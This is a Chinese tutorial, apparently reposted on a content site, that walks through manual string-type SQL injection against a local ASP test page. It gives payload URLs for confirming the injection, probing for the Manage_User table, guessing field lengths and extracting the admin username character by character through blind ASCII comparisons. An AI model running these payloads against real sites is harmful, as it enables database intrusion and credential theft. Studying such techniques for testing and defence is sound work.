注入笔记手工注入字符型注入漏洞脚本安全 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

   

    今天给大家讲解一下字符型注入点注入,也许很多朋友看到字符型的注入大部分都是放弃此注入去寻找其他数字型注入,因为字符型注入应用的不是很广泛,好了,这里我就来交大家字符型注入,

注入笔记手工注入字符型注入漏洞脚本安全

    首先打开http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包  /很明显,字符型注入,

    前几张我们说到了判断字符型注入的语句是' and '1'='1 和' and '1'=2  我们来看看。

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='1 返回正常。

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+'1'='2 返回错误。

   

   

   

    我们确定了注入点那么我们先看看数字型注入能否在这里使用

    先用联合查询 order by

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包+order+by+1   很明显,出错啦,不可使用。

    那么再用半猜解查询试试

   

   

    同样出错。

    看来字数字型注入在字符型注入中失效啦,那么我们来试试

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+Manage_User)>0+and+''=' 返回了正常,说明存在manage_user表。

   

   

    在sql语句中字符型参数必须用单引号闭合(')否则会出错。所以我们在注入中也先要用单引号来闭合语句。

    下面我们来猜字段名。

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(username)+from+Manage_User)>0+and+''='  返回正常,存在,

电脑资料

注入笔记手工注入字符型注入漏洞脚本安全》(http://meiwen.anslib.com)。

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)>0+and+''='  返回正常,存在。

    这里我只截一张图。

   

   

    下面判断一下username中字段长度

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)>4+and+''='  返回正常

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+top+1+len(password)+from+Manage_User)=5+and+''='  返回正常

   

   

    密码字段省略。下面进行猜解用户名。

    http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+manage_user+where+asc(mid(username,1))=97)+and+''='  返回正常,username表中第一位是ascll码97,明文为:a

   

   

    接着猜解第二位:http://localhost:2008/chanpin.asp?bigclassname=产品介绍&smallclassname=宠物包'+and+(select+count(*)+from+manage_user+where+asc(mid(username,2))=100)+and+''='

    返回正常,username字段中第二位ASCLL码为100,名为为d

    这里之后依次往下猜,最后得到username表中数据为:admin,打开数据库看一下是否一样。

    这里说明我们猜解正确。

   

最新文章